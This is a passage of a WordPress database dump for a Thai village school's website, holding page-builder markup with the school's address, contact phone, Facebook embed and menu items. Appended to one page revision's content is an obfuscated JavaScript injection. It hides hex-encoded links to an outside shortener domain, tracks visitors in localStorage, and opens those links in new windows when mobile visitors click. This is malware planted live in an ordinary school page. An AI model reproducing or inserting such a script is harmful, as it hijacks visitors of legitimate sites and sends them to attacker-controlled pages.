/wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-06 21:16:12','2024-08-06 14:16:12','',14,'http://pakhaeng.ssk.in.th/?p=570',0,'revision','',0),
(571,1,'2024-08-06 21:46:58','2024-08-06 14:46:58','','สีฟ้า สีเขียว น่ารัก การ์ตูน ยินดีต้อนรับเปิดภาคเรียนใหม่ เปิดเทอม Canvas Banner','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%9f%e0%b9%89%e0%b8%b2-%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%a7-%e0%b8%99%e0%b9%88%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%81-%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-06 21:46:58','2024-08-06 14:46:58','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner.png',0,'attachment','image/png',0),
(573,1,'2024-08-06 21:47:57','2024-08-06 14:47:57','','สีฟ้า สีเขียว น่ารัก การ์ตูน ยินดีต้อนรับเปิดภาคเรียนใหม่ เปิดเทอม Canvas Banner','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%9f%e0%b9%89%e0%b8%b2-%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%a7-%e0%b8%99%e0%b9%88%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%81-%e0%b8%81%e0%b8%b2%e0%b8%a3-2','','','2024-08-06 21:47:57','2024-08-06 14:47:57','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1.png',0,'attachment','image/png',0),
(574,1,'2024-08-06 21:49:03','2024-08-06 14:49:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span 